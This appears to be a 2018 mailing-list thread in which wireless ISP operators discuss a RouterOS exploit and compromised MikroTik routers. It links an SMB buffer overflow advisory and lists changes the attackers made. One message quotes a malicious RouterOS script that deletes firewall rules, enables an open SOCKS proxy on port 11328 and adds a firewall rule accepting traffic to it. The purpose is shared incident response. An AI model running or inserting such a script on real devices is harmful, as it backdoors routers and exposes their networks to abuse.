This has been detected in devices with earlier versions of ROS.
From: mikrotik-users-boun...@wispa.org <mikrotik-users-boun...@wispa.org> On Behalf Of Scott Reed via Mikrotik-users Sent: Monday, August 6, 2018 5:58 AM To: mikrotik-users@wispa.org Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 It will also change device identity, change admin password, add Admin, add 5 firewall filter rules to redirect forward traffic, change DNS server, enable DDNS, add IP Web Proxy rules and more, but that is all I remember off the top of my head. On 8/5/2018 20:57, Bob Pensworth via Mikrotik-users wrote: We are finding an IP/Socks connection: We are finding an event entry in System/Scheduler And the (below) script in System/Script: /ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip firewall filter add chain=input protocol=tcp port=11328 action=accept comment="port 11328";/ip firewall filter move [/ip firewall filter find comment="port 11328"] 1; -- Bob Pensworth, WA7BOB | General Manager <http://www.crescommwifi.com/> CresComm WiFi, LLC | (360) 928-0000, x1 From: mikrotik-users-boun...@wispa.org <mailto:mikrotik-users-boun...@wispa.org> <mailto:mikrotik-users-boun...@wispa.org> <mikrotik-users-boun...@wispa.org> On Behalf Of Shawn C. Peppers via Mikrotik-users Sent: Friday, March 16, 2018 11:54 AM To: mikrotik-users@wispa.org <mailto:mikrotik-users@wispa.org> ; memb...@wisp.org <mailto:memb...@wisp.org> Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 I have not tested this yet but.... https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow :: // Shawn Peppers :: // DirectlinkAdmin.com <http://DirectlinkAdmin.com> _______________________________________________ Mikrotik-users mailing list Mikrotik-users@wispa.org <mailto:Mikrotik-users@wispa.org> http://lists.wispa.org/mailman/listinfo/mikrotik-users -- Scott Reed SBRConsulting, LLC Network and Wireless Consulting WISPA Vendor Member IN UMC Associate Lay Leader SLI Coach Trained <http://www.avg.com/email-signature?utm_medium=email&utm_source=link&utm_campaign=sig-email&utm_content=emailclient> Virus-free. <http://www.avg.com/email-signature?utm_medium=email&utm_source=link&utm_campaign=sig-email&utm_content=emailclient> www.avg.com --- This email has been checked for viruses by Avast antivirus software. https://www.avast.com/antivirus
_______________________________________________ Mikrotik-users mailing list Mikrotik-users@wispa.org http://lists.wispa.org/mailman/listinfo/mikrotik-users